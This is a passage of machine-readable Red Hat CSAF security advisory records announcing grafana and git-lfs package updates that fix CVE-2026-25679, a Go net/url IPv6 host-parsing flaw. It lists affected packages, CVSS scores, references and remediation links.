"AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.s390x", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.aarch64", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.ppc64le", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.s390x", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.src", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.x86_64", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.aarch64", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.ppc64le", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.s390x", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.x86_64", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.aarch64", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.ppc64le", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.s390x", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9436"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for grafana is now available for Red Hat Enterprise Linux 9.2 Update Services for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. \n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:8879", "url": "https://access.redhat.com/errata/RHSA-2026:8879"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8879.json"}], "title": "Red Hat Security Advisory: grafana security update", "tracking": {"current_release_date": "2026-06-08T15:52:51+00:00", "generator": {"date": "2026-06-08T15:52:51+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:8879", "initial_release_date": "2026-04-20T02:44:19+00:00", "revision_history": [{"date": "2026-04-20T02:44:19+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-20T02:44:19+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:51+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product": {"name": "Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_e4s:9.2::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "grafana-0:9.0.9-11.el9_2.src", "product": {"name": "grafana-0:9.0.9-11.el9_2.src", "product_id": "grafana-0:9.0.9-11.el9_2.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@9.0.9-11.el9_2?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "grafana-0:9.0.9-11.el9_2.aarch64", "product": {"name": "grafana-0:9.0.9-11.el9_2.aarch64", "product_id": "grafana-0:9.0.9-11.el9_2.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@9.0.9-11.el9_2?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-debugsource-0:9.0.9-11.el9_2.aarch64", "product": {"name": "grafana-debugsource-0:9.0.9-11.el9_2.aarch64", "product_id": "grafana-debugsource-0:9.0.9-11.el9_2.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debugsource@9.0.9-11.el9_2?arch=aarch64"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:9.0.9-11.el9_2.aarch64", "product": {"name": "grafana-debuginfo-0:9.0.9-11.el9_2.aarch64", "product_id": "grafana-debuginfo-0:9.0.9-11.el9_2.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@9.0.9-11.el9_2?arch=aarch64"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "grafana-0:9.0.9-11.el9_2.ppc64le", "product": {"name": "grafana-0:9.0.9-11.el9_2.ppc64le", "product_id": "grafana-0:9.0.9-11.el9_2.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@9.0.9-11.el9_2?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-debugsource-0:9.0.9-11.el9_2.ppc64le", "product": {"name": "grafana-debugsource-0:9.0.9-11.el9_2.ppc64le", "product_id": "grafana-debugsource-0:9.0.9-11.el9_2.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debugsource@9.0.9-11.el9_2?arch=ppc64le"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:9.0.9-11.el9_2.ppc64le", "product": {"name": "grafana-debuginfo-0:9.0.9-11.el9_2.ppc64le", "product_id": "grafana-debuginfo-0:9.0.9-11.el9_2.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@9.0.9-11.el9_2?arch=ppc64le"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "grafana-0:9.0.9-11.el9_2.x86_64", "product": {"name": "grafana-0:9.0.9-11.el9_2.x86_64", "product_id": "grafana-0:9.0.9-11.el9_2.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@9.0.9-11.el9_2?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-debugsource-0:9.0.9-11.el9_2.x86_64", "product": {"name": "grafana-debugsource-0:9.0.9-11.el9_2.x86_64", "product_id": "grafana-debugsource-0:9.0.9-11.el9_2.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debugsource@9.0.9-11.el9_2?arch=x86_64"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:9.0.9-11.el9_2.x86_64", "product": {"name": "grafana-debuginfo-0:9.0.9-11.el9_2.x86_64", "product_id": "grafana-debuginfo-0:9.0.9-11.el9_2.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@9.0.9-11.el9_2?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}, {"branches": [{"category": "product_version", "name": "grafana-0:9.0.9-11.el9_2.s390x", "product": {"name": "grafana-0:9.0.9-11.el9_2.s390x", "product_id": "grafana-0:9.0.9-11.el9_2.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana@9.0.9-11.el9_2?arch=s390x"}}}, {"category": "product_version", "name": "grafana-debugsource-0:9.0.9-11.el9_2.s390x", "product": {"name": "grafana-debugsource-0:9.0.9-11.el9_2.s390x", "product_id": "grafana-debugsource-0:9.0.9-11.el9_2.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debugsource@9.0.9-11.el9_2?arch=s390x"}}}, {"category": "product_version", "name": "grafana-debuginfo-0:9.0.9-11.el9_2.s390x", "product": {"name": "grafana-debuginfo-0:9.0.9-11.el9_2.s390x", "product_id": "grafana-debuginfo-0:9.0.9-11.el9_2.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/grafana-debuginfo@9.0.9-11.el9_2?arch=s390x"}}}], "category": "architecture", "name": "s390x"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "grafana-0:9.0.9-11.el9_2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.aarch64"}, "product_reference": "grafana-0:9.0.9-11.el9_2.aarch64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:9.0.9-11.el9_2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.ppc64le"}, "product_reference": "grafana-0:9.0.9-11.el9_2.ppc64le", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:9.0.9-11.el9_2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.s390x"}, "product_reference": "grafana-0:9.0.9-11.el9_2.s390x", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:9.0.9-11.el9_2.src as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.src"}, "product_reference": "grafana-0:9.0.9-11.el9_2.src", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-0:9.0.9-11.el9_2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.x86_64"}, "product_reference": "grafana-0:9.0.9-11.el9_2.x86_64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:9.0.9-11.el9_2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.aarch64"}, "product_reference": "grafana-debuginfo-0:9.0.9-11.el9_2.aarch64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:9.0.9-11.el9_2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.ppc64le"}, "product_reference": "grafana-debuginfo-0:9.0.9-11.el9_2.ppc64le", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:9.0.9-11.el9_2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.s390x"}, "product_reference": "grafana-debuginfo-0:9.0.9-11.el9_2.s390x", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debuginfo-0:9.0.9-11.el9_2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.x86_64"}, "product_reference": "grafana-debuginfo-0:9.0.9-11.el9_2.x86_64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debugsource-0:9.0.9-11.el9_2.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.aarch64"}, "product_reference": "grafana-debugsource-0:9.0.9-11.el9_2.aarch64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debugsource-0:9.0.9-11.el9_2.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.ppc64le"}, "product_reference": "grafana-debugsource-0:9.0.9-11.el9_2.ppc64le", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debugsource-0:9.0.9-11.el9_2.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.s390x"}, "product_reference": "grafana-debugsource-0:9.0.9-11.el9_2.s390x", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "grafana-debugsource-0:9.0.9-11.el9_2.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.2)", "product_id": "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.x86_64"}, "product_reference": "grafana-debugsource-0:9.0.9-11.el9_2.x86_64", "relates_to_product_reference": "AppStream-9.2.0.Z.E4S"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.src", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-20T02:44:19+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.src", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:8879"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.src", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.src", "AppStream-9.2.0.Z.E4S:grafana-0:9.0.9-11.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-debuginfo-0:9.0.9-11.el9_2.x86_64", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.aarch64", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.ppc64le", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.s390x", "AppStream-9.2.0.Z.E4S:grafana-debugsource-0:9.0.9-11.el9_2.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:8879"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for git-lfs is now available for Red Hat Enterprise Linux 10.0 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.\n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9435", "url": "https://access.redhat.com/errata/RHSA-2026:9435"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9435.json"}], "title": "Red Hat Security Advisory: git-lfs security update", "tracking": {"current_release_date": "2026-06-08T15:52:50+00:00", "generator": {"date": "2026-06-08T15:52:50+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9435", "initial_release_date": "2026-04-21T17:12:00+00:00", "revision_history": [{"date": "2026-04-21T17:12:00+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-21T17:12:00+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:50+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product": {"name": "Red Hat Enterprise Linux AppStream EUS (v. 10.0)", "product_id": "AppStream-10.0.Z.E2S", "product_identification_helper": {"cpe": "cpe:/o:redhat:enterprise_linux_eus:10.0"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.6.1-2.el10_0.3.src", "product": {"name": "git-lfs-0:3.6.1-2.el10_0.3.src", "product_id": "git-lfs-0:3.6.1-2.el10_0.3.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.6.1-2.el10_0.3?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.6.1-2.el10_0.3.aarch64", "product": {"name": "git-lfs-0:3.6.1-2.el10_0.3.aarch64", "product_id": "git-lfs-0:3.6.1-2.el10_0.3.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.6.1-2.el10_0.3?arch=aarch64"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.aarch64", "product": {"name": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.aarch64", "product_id": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@3.6.1-2.el10_0.3?arch=aarch64"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.aarch64", "product": {"name": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.aarch64", "product_id": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@3.6.1-2.el10_0.3?arch=aarch64"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.6.1-2.el10_0.3.ppc64le", "product": {"name": "git-lfs-0:3.6.1-2.el10_0.3.ppc64le", "product_id": "git-lfs-0:3.6.1-2.el10_0.3.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.6.1-2.el10_0.3?arch=ppc64le"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.ppc64le", "product": {"name": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.ppc64le", "product_id": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@3.6.1-2.el10_0.3?arch=ppc64le"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.ppc64le", "product": {"name": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.ppc64le", "product_id": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@3.6.1-2.el10_0.3?arch=ppc64le"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.6.1-2.el10_0.3.s390x", "product": {"name": "git-lfs-0:3.6.1-2.el10_0.3.s390x", "product_id": "git-lfs-0:3.6.1-2.el10_0.3.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.6.1-2.el10_0.3?arch=s390x"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.s390x", "product": {"name": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.s390x", "product_id": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@3.6.1-2.el10_0.3?arch=s390x"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.s390x", "product": {"name": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.s390x", "product_id": "git-lfs-debuginfo-0:3.6.1-2.el10_0.3.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@3.6.1-2.el10_0.3?arch=s390x"}}}], "category": "architecture", "name": "s390x"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.6.1-2.el10_0.3.x86_64", "product": {"name": "git-lfs-0:3.6.1-2.el10_0.3.x86_64", "product_id": "git-lfs-0:3.6.1-2.el10_0.3.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.6.1-2.el10_0.3?arch=x86_64"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:3.6.1-2.el10_0.3.x86_64", "product": {"name": 